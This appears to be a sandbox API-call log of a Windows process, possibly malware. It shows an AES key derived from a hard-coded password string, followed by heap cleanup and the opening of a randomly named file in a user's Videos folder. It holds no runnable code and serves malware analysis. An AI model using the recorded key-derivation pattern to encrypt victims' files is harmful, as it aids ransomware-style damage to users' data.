CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.428] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0101.428] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0101.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0101.428] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0101.428] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.428] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0101.428] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0101.428] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0101.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0101.428] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.428] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0101.429] CryptHashData (hHash=0x41abfc0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0101.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.429] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0101.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cad18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0101.429] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac200) returned 1 [0101.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0101.429] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0101.429] CryptDestroyHash (hHash=0x41abfc0) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0101.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0101.431] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0101.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0101.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0101.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0101.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0101.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0101.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.434] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0101.434] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0101.434] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0101.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0101.434] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\GPtGPTImgDjIi0576udd.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\gptgptimgdjii0576udd.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0101.434] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.434] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.435] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0101.435] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ebc48 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0101.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0101.436] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd")) returned 0x10 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0101.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 